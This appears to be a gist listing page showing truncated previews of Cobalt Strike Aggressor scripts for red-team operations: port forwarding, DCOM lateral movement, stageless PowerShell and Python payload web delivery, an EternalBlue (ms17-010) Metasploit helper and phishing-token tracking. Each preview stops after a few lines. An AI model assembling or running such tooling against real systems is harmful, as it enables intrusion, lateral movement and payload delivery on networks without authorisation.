This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# | |
# port foreward alias in Beacon and SSH | |
# | |
# pull common code into a function | |
sub _portfwd { | |
if ($2 eq "stop") { | |
btask($1, "Tasked session to stop forward to $3"); | |
call("beacons.pivot_stop_port", $null, $3); | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Lateral Movement alias | |
# https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/ | |
# register help for our alias | |
beacon_command_register("com-exec", "lateral movement with DCOM", | |
"Synopsis: com-exec [target] [listener]\n\n" . | |
"Run a payload on a target via DCOM MMC20.Application Object"); | |
# here's our alias to collect our arguments | |
alias com-exec { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Scripted Web Delivery (Stageless) | |
# | |
# This script demonstrates some of the new APIs in Cobalt Strike 3.7. | |
# setup our stageless PowerShell Web Delivery attack | |
sub setup_attack { | |
local('%options $script $url $arch'); | |
%options = $3; | |
# get the arch right. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# | |
# This script overrides WEB_HIT and PROFILER_HIT from default.cna to | |
# resolve the id var (token) to an email | |
# | |
# https://www.cobaltstrike.com/aggressor-script/cobaltstrike.html | |
# | |
# method, uri, addr, ua, response, size, handler, when | |
set WEB_HIT { | |
local('$out $now $method $uri $addr $ua $response $size $handler $when $params'); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Python Stageless Scripted Web Delivery | |
# setup our stageless Python Web Delivery attack | |
sub setup_attack { | |
local('%options $x86payload $x64payload $url $script'); | |
%options = $3; | |
# generate our stageless x86 payload | |
artifact_stageless(%options["listener"], "raw", "x86", $null, $this); | |
yield; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# | |
# script to help move around with ms17-010 from Metasploit | |
# Go to Attacks -> Eternal Blue | |
# | |
# target, listener, where to save .rc file | |
sub generate_rc_file { | |
local('$target $listener $where $handle $shellcode'); | |
($target, $listener, $where) = @_; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# | |
# safe delete in file browser right-click menu | |
# | |
popup_clear("filebrowser"); | |
popup filebrowser { | |
item "&Download" { | |
local('$file'); | |
foreach $file ($3) { | |
bdownload($1, "$2 $+ \\ $+ $file"); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# demonstrate how to add a popup handler to a Swing component in Sleep | |
import java.awt.*; | |
import javax.swing.*; | |
import javax.swing.event.*; | |
# safely add a listener to show a popup | |
sub setupPopupMenu { | |
# we're using fork({}) to run this in a separate Aggressor Script environment. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# | |
# Demonstrate how to queue tasks to execute with each checkin... | |
# | |
# | |
# yield tells a function to pause and return a value. The next time the same instance of the | |
# function is called, it will resume after where it last yielded. | |
# | |
sub stuffToDo { | |
# Tasks for first checkin |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import aggressor.windows.BeaconConsole; | |
import java.awt.event.ActionEvent; | |
# $1 = beacon ID | |
# $2 = command + args to run [as if you typed it in the console] | |
sub beacon_input_command { | |
local('$event'); | |
# we make the console a static var because each console we create subscribes to a bunch of stuff | |
# and requires a manual step [normally performed by a Window close event] to clean up these things. |